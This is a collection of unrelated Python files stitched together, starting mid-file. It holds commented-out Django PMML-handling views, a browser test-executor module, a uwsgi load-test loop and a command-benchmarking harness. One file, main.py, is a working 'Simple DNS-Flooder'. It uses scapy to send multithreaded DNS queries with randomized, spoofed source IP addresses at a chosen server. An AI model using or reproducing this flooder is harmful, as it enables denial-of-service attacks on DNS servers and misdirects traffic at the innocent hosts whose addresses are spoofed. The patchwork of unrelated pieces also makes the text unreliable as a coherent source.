# if indexToDelete != -1:
# del existingPmmlObj.DeepNetwork[0].NetworkLayer[indexToDelete]
# existingPmmlObj.Header.Extension[0].anytypeobjs_ = ['']
# for lay in existingPmmlObj.DeepNetwork[0].NetworkLayer:
# if lay.Extension:
# lay.Extension[0].anytypeobjs_ = ['']
# existingPmmlObj.DeepNetwork[0].numberOfLayers = len(existingPmmlObj.DeepNetwork[0].NetworkLayer)
# try:
# lockForPMML.acquire()
# existingPmmlObj.export(open(filetoSave,'w'),0)
# except Exception as e:
# print('>>>>>>>>>> ', str(e))
# finally:
# lockForPMML.release()
# MEMORY_DICT_ARCHITECTURE[userInput['projectID']]['architecture']=existingArch
# message={'message':'Success'}
# return JsonResponse(message)
# @csrf_exempt
# @api_view(['POST'])
# def getGlobalObject(requests):
# global MEMORY_DICT_ARCHITECTURE
# return JsonResponse(MEMORY_DICT_ARCHITECTURE)
# @csrf_exempt
# @api_view(['POST'])
# @schema(getDetailsOfPMMLswagger)
# def getDetailsOfPMML(requests):
# # print('#######',requests.body)
# userInput=requests.body
# userInput=json.loads(userInput)
# filepath=userInput['filePath']
# # print('$$$$$$$$$$',filepath)
# # print('filepath',filepath)
# pmmlObj=pml.parse(filepath,silence=True)
# tempObj=pmmlObj.__dict__
# listOfObjectstogetData=[]
# for j in tempObj.keys():
# if (tempObj[j] is None) :
# pass
# elif (isinstance(tempObj[j], typing.List)):
# if (len(tempObj[j])==0):
# pass
# else:
# listOfObjectstogetData.append(j)
# else:
# listOfObjectstogetData.append(j)
# allInfo={}
# for towork in listOfObjectstogetData:
# if towork=='version':
# allInfo['Version']=tempObj['version']
# elif towork=='Header':
# allInfo.update(nyokaUtilities.getHeaderInfo(tempObj))
# elif towork=='DataDictionary':
# allInfo.update(nyokaUtilities.getDataFields(tempObj))
# elif towork=='NearestNeighborModel':
# allInfo.update(nyokaUtilities.getInfoNearestNeighborModel(tempObj))
# elif towork=='DeepNetwork':
# allInfo.update(nyokaUtilities.getInfoOfDeepNetwork(tempObj))
# elif towork=='MiningModel':
# allInfo.update(nyokaUtilities.getInfoMiningModel(tempObj))
# elif towork=='SupportVectorMachineModel':
# allInfo.update(nyokaUtilities.getInfoSupportVectorMachineModel(tempObj))
# elif towork=='TreeModel':
# allInfo.update(nyokaUtilities.getInfoTreeModel(tempObj))
# allInfo=nyokaUtilities.changeStructure(allInfo)
# print('response sent')
# return JsonResponse(allInfo)
|
base.py
|
import base64
import hashlib
import io
import json
import os
import threading
import traceback
import socket
import sys
from abc import ABCMeta, abstractmethod
from six import text_type
from six.moves.http_client import HTTPConnection
from six.moves.urllib.parse import urljoin, urlsplit, urlunsplit
from ..testrunner import Stop
from .actions import actions
from .protocol import Protocol, BaseProtocolPart
here = os.path.dirname(__file__)
def executor_kwargs(test_type, server_config, cache_manager, run_info_data,
**kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": server_config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type in ("reftest", "print-reftest"):
executor_kwargs["screenshot_cache"] = cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
# By default the executor may try to cleanup windows after a test (to best
# associate any problems with the test causing them). If the user might
# want to view the results, however, the executor has to skip that cleanup.
if kwargs["pause_after_test"] or kwargs["pause_on_unexpected"]:
executor_kwargs["cleanup_after_test"] = False
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlunsplit(url_parts)
class TestharnessResultConverter(object):
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT",
3: "PRECONDITION_FAILED"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN",
4: "PRECONDITION_FAILED"}
def __call__(self, test, result, extra=None):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message, extra=extra, stack=stack)
return (harness_result,
[test.subtest_result_cls(st_name, self.test_codes[st_status], st_message, st_stack)
for st_name, st_status, st_message, st_stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def hash_screenshots(screenshots):
"""Computes the sha1 checksum of a list of base64-encoded screenshots."""
return [hashlib.sha1(base64.b64decode(screenshot)).hexdigest()
for screenshot in screenshots]
def _ensure_hash_in_reftest_screenshots(extra):
"""Make sure reftest_screenshots have hashes.
Marionette internal reftest runner does not produce hashes.
"""
log_data = extra.get("reftest_screenshots")
if not log_data:
return
for item in log_data:
if type(item) != dict:
# Skip relation strings.
continue
if "hash" not in item:
item["hash"] = hash_screenshots([item["screenshot"]])[0]
def get_pages(ranges_value, total_pages):
"""Get a set of page numbers to include in a print reftest.
:param ranges_value: Parsed page ranges as a list e.g. [[1,2], [4], [6,None]]
:param total_pages: Integer total number of pages in the paginated output.
:retval: Set containing integer page numbers to include in the comparison e.g.
for the example ranges value and 10 total pages this would be
{1,2,4,6,7,8,9,10}"""
if not ranges_value:
return set(range(1, total_pages + 1))
rv = set()
for range_limits in ranges_value:
if len(range_limits) == 1:
range_limits = [range_limits[0], range_limits[0]]
if range_limits[0] is None:
range_limits[0] = 1
if range_limits[1] is None:
range_limits[1] = total_pages
if range_limits[0] > total_pages:
continue
rv |= set(range(range_limits[0], range_limits[1] + 1))
return rv
def reftest_result_converter(self, test, result):
extra = result.get("extra", {})
_ensure_hash_in_reftest_screenshots(extra)
return (test.result_cls(
result["status"],
result["message"],
extra=extra,
stack=result.get("stack")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
def crashtest_result_converter(self, test, result):
return test.result_cls(**result), []
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TimedRunner(object):
def __init__(self, logger, func, protocol, url, timeout, extra_timeout):
self.func = func
self.logger = logger
self.result = None
self.protocol = protocol
self.url = url
self.timeout = timeout
self.extra_timeout = extra_timeout
self.result_flag = threading.Event()
def run(self):
if self.set_timeout() is Stop:
return Stop
if self.before_run() is Stop:
return Stop
executor = threading.Thread(target=self.run_func)
executor.start()
# Add twice the extra timeout since the called function is expected to
# wait at least self.timeout + self.extra_timeout and this gives some leeway
timeout = self.timeout + 2 * self.extra_timeout if self.timeout else None
finished = self.result_flag.wait(timeout)
if self.result is None:
if finished:
# flag is True unless we timeout; this *shouldn't* happen, but
# it can if self.run_func fails to set self.result due to raising
self.result = False, ("INTERNAL-ERROR", "%s.run_func didn't set a result" %
self.__class__.__name__)
else:
if self.protocol.is_alive():
message = "Executor hit external timeout (this may indicate a hang)\n"
# get a traceback for the current stack of the executor thread
message += "".join(traceback.format_stack(sys._current_frames()[executor.ident]))
self.result = False, ("EXTERNAL-TIMEOUT", message)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
elif self.result[1] is None:
# We didn't get any data back from the test, so check if the
# browser is still responsive
if self.protocol.is_alive():
self.result = False, ("INTERNAL-ERROR", None)
else:
self.logger.info("Browser not responding, setting status to CRASH")
self.result = False, ("CRASH", None)
return self.result
def set_timeout(self):
raise NotImplementedError
def before_run(self):
pass
def run_func(self):
raise NotImplementedError
class TestExecutor(object):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
__metaclass__ = ABCMeta
test_type = None
convert_result = None
supports_testdriver = False
supports_jsshell = False
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def __init__(self, logger, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
self.logger = logger
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def reset(self):
"""Re-initialize internal state to facilitate repeated test execution
as implemented by the `--rerun` command-line argument."""
pass
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
try:
result = self.do_test(test)
except Exception as e:
exception_string = traceback.format_exc()
self.logger.warning(exception_string)
result = self.result_from_exception(test, e, exception_string)
if result is Stop:
return result
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol, subdomain=False):
scheme = "https" if protocol == "h2" else protocol
host = self.server_config["browser_host"]
if subdomain:
# The only supported subdomain filename flag is "www".
host = "{subdomain}.{host}".format(subdomain="www", host=host)
return "{scheme}://{host}:{port}".format(scheme=scheme, host=host,
port=self.server_config["ports"][protocol][0])
def test_url(self, test):
return urljoin(self.server_url(test.environment["protocol"],
test.subdomain), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e, exception_string):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "INTERNAL-ERROR"
message = text_type(getattr(e, "message", ""))
if message:
message += "\n"
message += exception_string
return test.result_cls(status, message), []
def wait(self):
self.protocol.base.wait()
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
is_print = False
def __init__(self, logger, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, logger, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class CrashtestExecutor(TestExecutor):
convert_result = crashtest_result_converter
class PrintRefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
is_print = True
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi, page_ranges):
key = (test.url, viewport_size, dpi)
if key not in self.screenshot_cache:
success, data = self.get_screenshot_list(test, viewport_size, dpi, page_ranges)
if not success:
return False, data
screenshots = data
hash_values = hash_screenshots(data)
self.screenshot_cache[key] = (hash_values, screenshots)
rv = (hash_values, screenshots)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def reset(self):
self.screenshot_cache.clear()
def check_pass(self, hashes, screenshots, urls, relation, fuzzy):
"""Check if a test passes, and return a tuple of (pass, page_idx),
where page_idx is the zero-based index of the first page on which a
difference occurs if any, or None if there are no differences"""
assert relation in ("==", "!=")
lhs_hashes, rhs_hashes = hashes
lhs_screenshots, rhs_screenshots = screenshots
if len(lhs_hashes) != len(rhs_hashes):
self.logger.info("Got different number of pages")
return False
assert len(lhs_screenshots) == len(lhs_hashes) == len(rhs_screenshots) == len(rhs_hashes)
for (page_idx, (lhs_hash,
rhs_hash,
lhs_screenshot,
rhs_screenshot)) in enumerate(zip(lhs_hashes,
rhs_hashes,
lhs_screenshots,
rhs_screenshots)):
comparison_screenshots = (lhs_screenshot, rhs_screenshot)
if not fuzzy or fuzzy == ((0, 0), (0, 0)):
equal = lhs_hash == rhs_hash
# sometimes images can have different hashes, but pixels can be identical.
if not equal:
self.logger.info("Image hashes didn't match%s, checking pixel differences" %
("" if len(hashes) == 1 else " on page %i" % (page_idx + 1)))
max_per_channel, pixels_different = self.get_differences(comparison_screenshots,
urls)
equal = pixels_different == 0 and max_per_channel == 0
else:
max_per_channel, pixels_different = self.get_differences(comparison_screenshots,
urls,
page_idx if len(hashes) > 1 else None)
allowed_per_channel, allowed_different = fuzzy
self.logger.info("Allowed %s pixels different, maximum difference per channel %s" %
("-".join(str(item) for item in allowed_different),
"-".join(str(item) for item in allowed_per_channel)))
equal = ((pixels_different == 0 and allowed_different[0] == 0) or
(max_per_channel == 0 and allowed_per_channel[0] == 0) or
(allowed_per_channel[0] <= max_per_channel <= allowed_per_channel[1] and
allowed_different[0] <= pixels_different <= allowed_different[1]))
if not equal:
return (False if relation == "==" else True, page_idx)
# All screenshots were equal within the fuzziness
return (True if relation == "==" else False, None)
def get_differences(self, screenshots, urls, page_idx=None):
from PIL import Image, ImageChops, ImageStat
lhs = Image.open(io.BytesIO(base64.b64decode(screenshots[0]))).convert("RGB")
rhs = Image.open(io.BytesIO(base64.b64decode(screenshots[1]))).convert("RGB")
self.check_if_solid_color(lhs, urls[0])
self.check_if_solid_color(rhs, urls[1])
diff = ImageChops.difference(lhs, rhs)
minimal_diff = diff.crop(diff.getbbox())
mask = minimal_diff.convert("L", dither=None)
stat = ImageStat.Stat(minimal_diff, mask)
per_channel = max(item[1] for item in stat.extrema)
count = stat.count[0]
self.logger.info("Found %s pixels different, maximum difference per channel %s%s" %
(count,
per_channel,
"" if page_idx is None else " on page %i" % (page_idx + 1)))
return per_channel, count
def check_if_solid_color(self, image, url):
extrema = image.getextrema()
if all(min == max for min, max in extrema):
color = ''.join('%02X' % value for value, _ in extrema)
self.message.append("Screenshot is solid color 0x%s for %s\n" % (color, url))
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
page_ranges = test.page_ranges
self.message = []
# Depth-first search of reference tree, with the goal
# of reachings a leaf node with only pass results
stack = list(((test, item[0]), item[1]) for item in reversed(test.references))
page_idx = None
while stack:
hashes = [None, None]
screenshots = [None, None]
urls = [None, None]
nodes, relation = stack.pop()
fuzzy = self.get_fuzzy(test, nodes, relation)
for i, node in enumerate(nodes):
success, data = self.get_hash(node, viewport_size, dpi, page_ranges)
if success is False:
return {"status": data[0], "message": data[1]}
hashes[i], screenshots[i] = data
urls[i] = node.url
is_pass, page_idx = self.check_pass(hashes, screenshots, urls, relation, fuzzy)
if is_pass:
fuzzy = self.get_fuzzy(test, nodes, relation)
if nodes[1].references:
stack.extend(list(((nodes[1], item[0]), item[1])
for item in reversed(nodes[1].references)))
else:
# We passed
return {"status": "PASS", "message": None}
# We failed, so construct a failure message
if page_idx is None:
# default to outputting the last page
page_idx = -1
for i, (node, screenshot) in enumerate(zip(nodes, screenshots)):
if screenshot is None:
success, screenshot = self.retake_screenshot(node, viewport_size, dpi, page_ranges)
if success:
screenshots[i] = screenshot
log_data = [
{"url": nodes[0].url,
"screenshot": screenshots[0][page_idx],
"hash": hashes[0][page_idx]},
relation,
{"url": nodes[1].url,
"screenshot": screenshots[1][page_idx],
"hash": hashes[1][page_idx]},
]
return {"status": "FAIL",
"message": "\n".join(self.message),
"extra": {"reftest_screenshots": log_data}}
def get_fuzzy(self, root_test, test_nodes, relation):
full_key = tuple([item.url for item in test_nodes] + [relation])
ref_only_key = test_nodes[1].url
fuzzy_override = root_test.fuzzy_override
fuzzy = test_nodes[0].fuzzy
sources = [fuzzy_override, fuzzy]
keys = [full_key, ref_only_key, None]
value = None
for source in sources:
for key in keys:
if key in source:
value = source[key]
break
if value:
break
return value
def retake_screenshot(self, node, viewport_size, dpi, page_ranges):
success, data = self.get_screenshot_list(node,
viewport_size,
dpi,
page_ranges)
if not success:
return False, data
key = (node.url, viewport_size, dpi)
hash_val, _ = self.screenshot_cache[key]
self.screenshot_cache[key] = hash_val, data
return True, data
def get_screenshot_list(self, node, viewport_size, dpi, page_ranges):
success, data = self.executor.screenshot(node, viewport_size, dpi, page_ranges)
if success and not isinstance(data, list):
return success, [data]
return success, data
class WdspecExecutor(TestExecutor):
convert_result = pytest_result_converter
protocol_cls = None
def __init__(self, logger, browser, server_config, webdriver_binary,
webdriver_args, timeout_multiplier=1, capabilities=None,
debug_info=None, **kwargs):
self.do_delayed_imports()
TestExecutor.__init__(self, logger, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.webdriver_binary = webdriver_binary
self.webdriver_args = webdriver_args
self.timeout_multiplier = timeout_multiplier
self.capabilities = capabilities
self.protocol = self.protocol_cls(self, browser)
def is_alive(self):
return self.protocol.is_alive()
def on_environment_change(self, new_environment):
pass
def do_test(self, test):
timeout = test.timeout * self.timeout_multiplier + self.extra_timeout
success, data = WdspecRun(self.do_wdspec,
self.protocol.session_config,
test.abs_path,
timeout).run()
if success:
return self.convert_result(test, data)
return (test.result_cls(*data), [])
def do_wdspec(self, session_config, path, timeout):
return pytestrunner.run(path,
self.server_config,
session_config,
timeout=timeout)
def do_delayed_imports(self):
global pytestrunner
from . import pytestrunner
class WdspecRun(object):
def __init__(self, func, session, path, timeout):
self.func = func
self.result = (None, None)
self.session = session
self.path = path
self.timeout = timeout
self.result_flag = threading.Event()
def run(self):
"""Runs function in a thread and interrupts it if it exceeds the
given timeout. Returns (True, (Result, [SubtestResult ...])) in
case of success, or (False, (status, extra information)) in the
event of failure.
"""
executor = threading.Thread(target=self._run)
executor.start()
self.result_flag.wait(self.timeout)
if self.result[1] is None:
self.result = False, ("EXTERNAL-TIMEOUT", None)
return self.result
def _run(self):
try:
self.result = True, self.func(self.session, self.path, self.timeout)
except (socket.timeout, IOError):
self.result = False, ("CRASH", None)
except Exception as e:
message = getattr(e, "message")
if message:
message += "\n"
message += traceback.format_exc()
self.result = False, ("INTERNAL-ERROR", message)
finally:
self.result_flag.set()
class ConnectionlessBaseProtocolPart(BaseProtocolPart):
def load(self, url):
pass
def execute_script(self, script, asynchronous=False):
pass
def set_timeout(self, timeout):
pass
def wait(self):
pass
def set_window(self, handle):
pass
def window_handles(self):
return []
class ConnectionlessProtocol(Protocol):
implements = [ConnectionlessBaseProtocolPart]
def connect(self):
pass
def after_connect(self):
pass
class WdspecProtocol(Protocol):
server_cls = None
implements = [ConnectionlessBaseProtocolPart]
def __init__(self, executor, browser):
Protocol.__init__(self, executor, browser)
self.webdriver_binary = executor.webdriver_binary
self.webdriver_args = executor.webdriver_args
self.capabilities = self.executor.capabilities
self.session_config = None
self.server = None
def connect(self):
"""Connect to browser via the HTTP server."""
self.server = self.server_cls(
self.logger,
binary=self.webdriver_binary,
args=self.webdriver_args)
self.server.start(block=False)
self.logger.info(
"WebDriver HTTP server listening at %s" % self.server.url)
self.session_config = {"host": self.server.host,
"port": self.server.port,
"capabilities": self.capabilities}
def after_connect(self):
pass
def teardown(self):
if self.server is not None and self.server.is_alive():
self.server.stop()
def is_alive(self):
"""Test that the connection is still alive.
Because the remote communication happens over HTTP we need to
make an explicit request to the remote. It is allowed for
WebDriver spec tests to not have a WebDriver session, since this
may be what is tested.
An HTTP request to an invalid path that results in a 404 is
proof enough to us that the server is alive and kicking.
"""
conn = HTTPConnection(self.server.host, self.server.port)
conn.request("HEAD", self.server.base_path + "invalid")
res = conn.getresponse()
return res.status == 404
class CallbackHandler(object):
"""Handle callbacks from testdriver-using tests.
The default implementation here makes sense for things that are roughly like
WebDriver. Things that are more different to WebDriver may need to create a
fully custom implementation."""
unimplemented_exc = (NotImplementedError,)
def __init__(self, logger, protocol, test_window):
self.protocol = protocol
self.test_window = test_window
self.logger = logger
self.callbacks = {
"action": self.process_action,
"complete": self.process_complete
}
self.actions = {cls.name: cls(self.logger, self.protocol) for cls in actions}
def __call__(self, result):
url, command, payload = result
self.logger.debug("Got async callback: %s" % result[1])
try:
callback = self.callbacks[command]
except KeyError:
raise ValueError("Unknown callback type %r" % result[1])
return callback(url, payload)
def process_complete(self, url, payload):
rv = [strip_server(url)] + payload
return True, rv
def process_action(self, url, payload):
action = payload["action"]
cmd_id = payload["id"]
self.logger.debug("Got action: %s" % action)
try:
action_handler = self.actions[action]
except KeyError:
raise ValueError("Unknown action %s" % action)
try:
with ActionContext(self.logger, self.protocol, payload.get("context")):
result = action_handler(payload)
except self.unimplemented_exc:
self.logger.warning("Action %s not implemented" % action)
self._send_message(cmd_id, "complete", "error", "Action %s not implemented" % action)
except Exception:
self.logger.warning("Action %s failed" % action)
self.logger.warning(traceback.format_exc())
self._send_message(cmd_id, "complete", "error")
raise
else:
self.logger.debug("Action %s completed with result %s" % (action, result))
return_message = {"result": result}
self._send_message(cmd_id, "complete", "success", json.dumps(return_message))
return False, None
def _send_message(self, cmd_id, message_type, status, message=None):
self.protocol.testdriver.send_message(cmd_id, message_type, status, message=message)
class ActionContext(object):
def __init__(self, logger, protocol, context):
self.logger = logger
self.protocol = protocol
self.context = context
self.initial_window = None
def __enter__(self):
if self.context is None:
return
self.initial_window = self.protocol.base.current_window
self.logger.debug("Switching to window %s" % self.context)
self.protocol.testdriver.switch_to_window(self.context)
def __exit__(self, *args):
if self.context is None:
return
self.logger.debug("Switching back to initial window")
self.protocol.base.set_window(self.initial_window)
self.protocol.testdriver._switch_to_frame(None)
self.initial_window = None
|
main.py
|
#!./env/bin/python3
from scapy.all import *
from time import sleep
from sys import exit as sysexit
import string
import random
import threading
from argparse import ArgumentParser
# check for root
if not os.geteuid() == 0:
sysexit("\nOnly root can run this script\n")
# init option parser
parser = ArgumentParser(description='Simple DNS-Flooder')
parser.add_argument("-s", "--server", help='DNS-Server IP Address', required=True)
parser.add_argument("-t", "--threads", type=int, help='Threads to use', required=True)
args = parser.parse_args()
# perform dns query
def perform_query(dns, domain, sourceIP):
packet = IP(src=sourceIP, dst=dns) / UDP() / DNS(rd=1, qd=DNSQR(qname=domain))
send(packet)
# randomized Domain
def get_rand_domain():
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(6))
# randomized IP
def get_random_IP():
genIP = ""
for i in range(0, 4):
part = str(random.randint(1,254))
genIP += part + "."
return genIP[:-1]
# flood
def flood():
while True:
global answ
domainToUse = get_rand_domain()
ipToUse = get_random_IP()
try:
answ = perform_query(args.server, f"{domainToUse}.com", ipToUse)
except:
domainToUse = get_rand_domain()
# start threads
def start_threads():
threads = int(args.threads)
for i in range(1,threads):
t = threading.Thread(target=flood)
t.start()
# start here
if __name__ == "__main__":
print(f"Starting Flood of {args.server} with {args.threads} Threads in 3 seconds ...")
sleep(3)
start_threads()
|
request.py
|
# Uses 6 threads to generate requests and force uwsgi
# queuing to happen
import requests
import threading
def request_loop():
while True:
requests.get('http://uwsgi-test:8080/')
if __name__ == "__main__":
threads = []
for i in range(20):
t = threading.Thread(target=request_loop)
threads.append(t)
t.start()
for t in threads:
t.join()
|
testmaster.py
|
# Authors: Dennis Benz, Levin Nemesch, Jo Sandor
# Version 1, 2022
import multiprocessing as mp
import resource
import subprocess as sp
import json
import sys, getopt
from time import time, sleep
import threading as thr
from queue import Queue
# Font utility class for formattet output
class font:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
# If this is true, a bunch of debug print statements are printed
DEBUG = True
def process_input(json_filename):
"""
Utility function that parses the input from a json file to a dictionary
@param json_filename Name of the input file
@return A dictionary that is parsed from the json file
"""
data = 1
try:
with open(json_filename) as json_file:
data = json.load(json_file)
return data
except FileNotFoundError:
print("Input file does not exist.")
print_usage()
sys.exit(2)
def get_input_file(argv):
"""
Processes the arguments given to the program.
@param argv Must be system arguments
@return The name of the input file
"""
input_file = ''
try:
opts, args = getopt.getopt(argv,"hi:o:d",["ifile=","ofile="])
except getopt.GetoptError:
print_usage()
sys.exit(2)
if len(sys.argv) == 1:
print_usage()
sys.exit()
for opt, arg in opts:
if opt == '-h' or opt == "-help":
print_usage()
sys.exit()
elif opt in ("-i", "--ifile"):
input_file = arg
elif opt == "-d":
global DEBUG
DEBUG = False
return input_file
def print_usage(complete=True):
"""
A nice generated welcome message when the Testmaster is used with incorrect or missing keywords.
"""
if complete:
print(font.BOLD + font.CYAN + "Welcome to Testmaster" + font.END + font.END)
print("Provide an input file in the following way:")
print("testmaster.py", font.BOLD + "-i" + font.END, "[input_file_name].json",)
print("To disable the output set flag -d.")
print("The required format of the json-file is specified here:")
print(font.BLUE + "https://gitpgtcs.informatik.uni-osnabrueck.de/spanners/experiments/-/tree/testmaster" + font.END)
def check_json_keys(json_dict):
"""
Checks if all required keys are set
:param json_dict: dict parsed from json
:return: True if required key are set
"""
required_keys = ["command", "runtime", "weight", "actual_stretch", "graph_information"]
required_graph_information = ["nodes", "edges", "directed", "weighted", "simple"]
for key in required_keys:
if key not in json_dict:
return False
for key in required_graph_information:
if key not in json_dict["graph_information"]:
return False
return True
def parse_command_data(cmd, data):
"""
Parses the stdout and stderr data of a command
:param cmd: Command related to the data
:param data: (stdout_data, stderr_data)
:type data: tuple
:return: output json string
"""
output, error = data
error_dict = {"command": cmd}
# error in subprocess
if error:
# C++ should throw a "Memory Limit Exceeded" error and Python "MemoryError" if memory limit is exceeded
if "Memory" in error:
error_dict["error"] = "Memory limit exceeded."
else:
error_dict["error"] = error
return json.dumps(error_dict)
# parse json output
try:
parsed_output = json.loads(output)
# add command if not included
if "command" not in parsed_output:
parsed_output["command"] = cmd
if check_json_keys(parsed_output):
return json.dumps(parsed_output)
else:
error_dict["error"] = "Please provide all required keys in the json output."
error_dict["output"] = output
return json.dumps(error_dict)
except json.JSONDecodeError:
error_dict["error"] = "The command output can't be parsed. Ensure that the output is formatted in json."
error_dict["output"] = output
return json.dumps(error_dict)
def create_output_str(json_output, i):
"""
Creates an output string that allows for the json output strings to be parsed into a big output file
@param json_output string of one single json output of a process
@param i index of the process
"""
return ',\n' + '"Test' + str(i) + '" : ' + json_output
def work(queue, lock, time_limit, memory_limit, output_queue):
"""
Worker function which starts a subprocess and handles time and memory limit.
Handles writing the result to the output file.
@param queue The queue to pop new jobs from
@param output_file A global output file where all finished jobs write to
@param time_limit A global time limit for all jobs in ms
@param memory_limit A global memory limit for all jobs in MB
"""
# calculate the memory limit. It is passed as MB so it needs to be calculated to byte first
def set_mem_limit():
ml = memory_limit * 1000000
resource.setrlimit(resource.RLIMIT_AS, (ml, resource.RLIM_INFINITY))
while True:
lock.acquire()
if queue.empty():
lock.release()
break
task_index, cmd = queue.get()
lock.release()
try:
commands = cmd.split()
proc = sp.Popen(commands, shell=False, stdout=sp.PIPE, stderr=sp.PIPE, text=True, preexec_fn=set_mem_limit)
try:
# Pre function set_mem_limit limits the memory that is used for one job
# Since the queue items are a tuple with an index, access with indexing on [1]
proc.wait(timeout=time_limit/1000) # ms to second
# parse command data
json_output = parse_command_data(cmd, proc.communicate())
if DEBUG:
print("Test", task_index, "finished.", cmd)
output_queue.put(create_output_str(json_output, task_index))
except sp.TimeoutExpired as e:
json_output = json.dumps({"command": cmd, "error": "Time limit exceeded."})
if DEBUG:
print("Test", task_index, "didn't finish.", "Timeout expired.", cmd)
output_queue.put(create_output_str(json_output, task_index))
finally:
proc.kill()
except Exception as e:
json_output = json.dumps({"command": cmd, "error": e})
if DEBUG:
print("Test", task_index, "didn't finish.", "Error occurred.", cmd)
output_queue.put(create_output_str(json_output, task_index))
class OutputThread(thr.Thread):
"""
A class for the daemon to thread securely write the results of the finished processes while the testmaster is running
@param output_queue A queue where the output strings are stored
@param output_file The target output file where the thread is supposed to write to
"""
def __init__(self, output_queue, output_file):
super().__init__(daemon=True)
self.output_queue = output_queue
self.output_file = output_file
self._thread_stopped = thr.Event()
def stop(self):
self._thread_stopped.set()
def stopped(self):
return self._thread_stopped.is_set()
def run(self):
while True:
if not self.output_queue.empty():
with open(self.output_file, 'a') as f:
f.write(self.output_queue.get())
if self.stopped():
break
sleep(1)
# if DEBUG:
# print("daemon still running!")
if __name__ == "__main__":
# Get the input file specified and extract the parameters from the dictionary
input_file = get_input_file(sys.argv[1:])
input = process_input(input_file)
time_limit = input["time_limit"]
memory_limit = input["memory_limit"]
number_processes = input["number_processes"]
commands = input["commands"]
output_filename = input["output_filename"]
print(font.BOLD + font.CYAN + "Welcome to Testmaster" + font.END + font.END)
print("Running some tests now. output =", DEBUG, "\n")
# Check if the input file is ok
if not all(isinstance(i, int) for i in [time_limit, memory_limit, number_processes]):
print("Error in input file: time_limit, memory_limit and number_processes must be integers.")
print_usage(False)
exit(1)
if not type(commands) == list:
print("Error in input file: commands must be a list of shell commands")
print_usage(False)
exit(1)
if not type(output_filename) == str:
print("Error in input file: output_filename must be a string containing a valid file path")
print_usage(False)
exit(1)
if DEBUG:
print(font.BOLD + 'Input file:' + font.END, input_file)
print(font.BOLD + "Metadata:" + font.END,
str(time_limit)+"ms,",
str(memory_limit)+"MB,",
str(number_processes)+" processes,",
)
print(font.BOLD + "Commands:" + font.END,)
for i, c in enumerate(commands):
print(str(i) + ".", font.GREEN + c + font.END)
print(font.BOLD + "Write to:" + font.END, output_filename)
